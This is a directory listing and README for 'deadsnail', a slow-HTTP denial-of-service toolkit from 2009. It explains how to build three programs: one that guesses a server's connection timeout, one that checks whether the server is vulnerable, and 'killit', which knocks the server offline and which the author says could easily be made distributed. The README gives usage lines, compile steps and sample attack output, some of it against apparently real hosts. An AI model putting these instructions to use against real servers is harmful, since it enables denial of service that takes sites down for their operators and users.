Index of /~cia/files/deadsnail

[ICO]NameLast modifiedSizeDescription
[DIR]Parent Directory   -  
[ ]deadsnail.tar.gz 25-Jun-2009 12:41 2.1M 
this is a simple way to test if a tcp service (in  this case http) is
vulnerable to dead snails attacks.

a dead snail is just a dead snail. it doesn't move but if you look enough at
it you may have the impression that its moving. picture yourself watching 1k
deadsnails to see them if they move or not. you wont be able to do anything
else and better than that some of them will move ... 

this can be applied in our case to a http service. throw few K of dead snails
at and let it watch them moving. 


no_flames: you can't blame any tcp service for doing this. as i said on
isc.sans.org:
>>>>>>>
>anyway, this is not a bug, neither i can call it a flaw, it is just a friendly
>manner to serve the requests that can be exploited by the bad guy. i don't see
>anything wrong (ethically speaking) in resetting that timer the way it is
>(think congestions and the fact that there MAY be real slow clients) but ...
>one should be prepared to say "I'm sorry but i have to drop you" to the most
>lazy connection. care should be taken when computing laziness factor on big
>posts.

++++++++++++++++=

i ran all this b.s. on a gentoo linux 2.6.29 amd64 gcc 432 libc 2.8.
with small modifications this animal could run on bsd platforms as well. one needs
to translate corking and nodelays.

just so you know one way to test http service availability during and
before/after  attack:

echo -en  "GET / HTTP/1.0\r\nHost: localhost\r\n\r\n" | nc
-vvvvvvvvv localhost 80 | head -1

if your service is f... dead you'll have to hit ctrl+c:
localhost.localdomain [127.0.0.1] 80 (http) open
^C sent 35, rcvd 0

if not (after/before attac) you will receive:


localhost.localdomain [127.0.0.1] 80 (http) open
 sent 35, rcvd 318
 HTTP/1.1 200 OK




to execute, do this:

1. run diggit http://localhost  >links.h 2>diggit.log
in the source directory.

this will create a sitemap and generate links.h

diggit require:

HTML::LinkExtor;
HTML::Form;
LWP::UserAgent;
URI::URL;
Data::Dumper;

you can install those from cpan.
if you dig your localhost (as it should) make sure you have some links over
there to generate the site map (make an alias to some /usr/share/doc/***
folder with html files)


2.compile:

ulimit -n 8192 (or not, if you have access to the service you test go and
lower the resources instead of increasing the local ones. its the same thing
only better)

ATTENTION: you will need state threads from http://state-threads.sf.net
i compiled state threads with:
make EXTRA_CFLAGS="-DUSE_POLL -DFD_SETSIZE=8192 -DST_MIN_POLLFDS_SIZE=256"
linux-debug

a successfull state threads compilation will create a folder:
<build-root>/st-1.8/LINUX_<version>-<os_vendor>-r1_<compilation_type>
modify deadsnail's Makefile ST_HOME variable to reflect the correct state threads builddir
export LD_LIBRARY_PATH with ST_HOME included in the shell you will run the
exploits.


go next ==========>>>>>>>>>>>>>.....

make all
result: 3 executables: fingerit, snailit and killit

fingerit will guess the timeout setuped on target host
snailit will test if the host is vulnerable without attacking i t
killit will dos the host


++++++++++++++++++++++

running:
fingerit <hostname> <port>

example output:
cia@localhost ~/dev/deadsnail(fingering) $ ./fingerit server.com 80
resolving timeout on connection to server.com:80, this may take a while
depending on remote server setup
wrote 3 bytes to net bufs, waiting on local buffers to flush ... buffers
flushed to net!
waiting on remote timeout ... 
error returned as expected,timeout=10 seconds, error_code=0,
error_msg="Success"



that showed you the timeout setuped on the server side


+++++++++++++++++++++++


you will use that with snailit

usage:
./snailit <hostname> <port> <fingerit_observed_timeout>

example (hitting a vulnerable apache http service) - see that timeout i
setuped on it is 10 seconds but i can keep running a single request for 1272
seconds (in fact i can run it undefinetly long but i was left out of bytes to
send):

cia@localhost ~/dev/deadsnail(fingering) $ ./snailit bofh.sysami.com 80 10
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698342,next_sleep_period=6s,running_since=0s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698348,next_sleep_period=6s,running_since=6s
prev_bytes_queued=0,bytes_sent=5,timestamp=1245698354,next_sleep_period=6s,running_since=12s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245698360,next_sleep_period=6s,running_since=18s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698366,next_sleep_period=6s,running_since=24s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245698372,next_sleep_period=6s,running_since=30s
prev_bytes_queued=0,bytes_sent=3,timestamp=1245698378,next_sleep_period=6s,running_since=36s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245698384,next_sleep_period=6s,running_since=42s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245698390,next_sleep_period=6s,running_since=48s
....
...
....
....
prev_bytes_queued=0,bytes_sent=5,timestamp=1245699663,next_sleep_period=6s,running_since=1254s
prev_bytes_queued=0,bytes_sent=5,timestamp=1245699669,next_sleep_period=6s,running_since=1260s
prev_bytes_queued=0,bytes_sent=4,timestamp=1245699675,next_sleep_period=6s,running_since=1266s
prev_bytes_queued=0,bytes_sent=3,timestamp=1245699681,next_sleep_period=6s,running_since=1272s

if the request will finish (we will be sending just one) then you'll also get
the response from http server



running snailit against a NOT vulnerable squid service (with timeout set on 30
seconds - will close my connection without any doubts):
cia@localhost ~/dev/deadsnail(fingering) $ ./snailit
liver.cdn-cache.twinbyte.com 80 30 
prev_bytes_queued=0,bytes_sent=4,timestamp=1245699704,next_sleep_period=19s,running_since=1s
prev_bytes_queued=0,bytes_sent=3,timestamp=1245699723,next_sleep_period=11s,running_since=20s
prev_bytes_queued=0,bytes_sent=2,timestamp=1245699734,next_sleep_period=21s,running_since=31s
cia@localhost ~/dev/deadsnail(fingering) $




______________________________________________________________________
running killit:
killit is a light version of what was killap in 2007 - a ddos tool. now its a
dos tool but one may easy transform it.

usage: ./killit <host> <port> <remote_timeout> <snails_amount>
host and port ... well its the target info u used before
remote_timeout is the timeout from fingerit 
snails_amount is the amount of snails you want to throw into the wild

for example i tested an apache with timeout set to 10 seconds and maxclients
512, etc.
that would be:
./killit localhost 80 10 513 :)


====================================================================

this prooves timeout-reset bug.